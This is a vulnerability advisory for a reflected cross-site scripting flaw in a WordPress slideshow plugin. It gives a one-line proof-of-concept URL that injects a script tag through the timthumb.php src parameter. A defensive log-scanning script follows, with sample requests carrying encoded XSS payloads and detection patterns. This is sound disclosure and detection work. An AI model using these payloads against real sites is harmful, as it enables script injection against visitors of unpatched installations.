WordPress Feature Slideshow 1.0.6-beta Cross Site Scripting

2011-01-25T00:00:00
ID PACKETSTORM:97825
Type packetstorm
Reporter AutoSec Tools
Modified 2011-01-25T00:00:00

Description

------------------------------------------------------------------------  
Software................WordPress Feature Slideshow 1.0.6-beta  
Vulnerability...........Reflected Cross-site Scripting  
Download................http://sleek.no/kunder/138  
Release Date............1/24/2011  
Tested On...............Windows 7 + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
------------------------------------------------------------------------  
  
--Description--  
  
A reflected cross-site scripting vulnerability in WordPress Feature  
Slideshow 1.0.6-beta can be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
http://localhost/wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=<script>alert(0)</script>  
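As an added defender-side example (not part of the Packet Storm advisory and not the plugin's own code), the Python below scans web-server access logs for requests to the timthumb.php path named above whose `src` parameter carries markup rather than an image path. The log lines are constructed, the "what a valid src looks like" policy is an assumption, and the scanner also undoes repeated percent-encoding so a double-encoded payload is not missed.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample lines in Apache combined-log format (not taken from the advisory).
# Line 2 is the percent-encoded form of the advisory's PoC payload; line 4 is double-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Jan/2011:10:01:02 +0000] "GET /wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=wp-content/uploads/2011/01/banner.jpg&w=600 HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Jan/2011:10:01:07 +0000] "GET /wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Jan/2011:10:01:09 +0000] "GET /wordpress/index.php?s=hello HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.12 - - [25/Jan/2011:10:02:11 +0000] "GET /wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=%253Cimg%20onerror%3Dx%253E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Client IP, method and request target from a combined-format line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup or script-ish fragments that never belong in an image path.
MARKUP_RE = re.compile(r"<|>|javascript:|\bon\w+\s*=", re.IGNORECASE)
# Assumed policy: a legitimate src for an image resizer is a relative or http(s) path to an image file.
IMAGE_PATH_RE = re.compile(r"^(https?://[\w.-]+/)?[\w./-]+\.(?:jpe?g|png|gif)$", re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %253C is seen as '<', not as '%3C'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_src(src: str) -> Optional[str]:
    """Return a reason if the src value looks like an injection attempt, else None."""
    decoded = fully_decode(src)
    if MARKUP_RE.search(decoded):
        return "markup in src"
    if not IMAGE_PATH_RE.match(decoded):
        return "src is not an image path"
    return None


def scan_log(text: str) -> list:
    """Return one finding per suspicious src value sent to timthumb.php."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlparse(m.group("target"))
        if not target.path.endswith("/timthumb.php"):
            continue
        params = parse_qs(target.query, keep_blank_values=True)
        for src in params.get("src", []):
            reason = classify_src(src)
            if reason:
                findings.append({"ip": m.group("ip"), "src": fully_decode(src), "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']}: {f['reason']}: {f['src']!r}")
```

Running it over the constructed sample flags the two timthumb.php requests whose `src` decodes to HTML and leaves the legitimate thumbnail request and the unrelated search request alone. The positive check against an image-path pattern is the part to tune to the site: it catches non-markup abuse of `src` (for example a remote script URL) that a markup-only regex would miss.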